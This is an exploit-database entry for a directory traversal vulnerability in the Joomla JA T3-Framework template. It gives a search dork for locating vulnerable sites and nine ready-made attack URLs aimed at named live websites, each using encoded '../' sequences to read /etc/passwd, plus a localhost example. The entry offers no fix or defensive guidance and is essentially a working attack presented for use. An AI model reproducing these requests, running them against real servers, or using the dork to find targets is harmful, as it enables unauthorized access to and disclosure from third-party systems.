[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla template JA T3-Framework Directory Traversal Vulnerability

Author
indoushka
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18065
Category
web applications
Date add
17-04-2012
Platform
php
=======================================================================
Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day
=======================================================================

# Vendor:
hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15

# Author : indoushka

# Tested on : Ubuntu Linux 9.10

########################################################


# Dork : inurl:/index.php?jat3action=

# Demo :
http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=
gzip&type=css&v=1

http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t
ype=css&v=1

http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ
e=css&v=1

http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action
=gzip&type=css&v=1

http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip
&type=css&v=1

-------------

http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&
amp;type=css&v=1

******************************************************



#  0day.today [2024-12-23]  #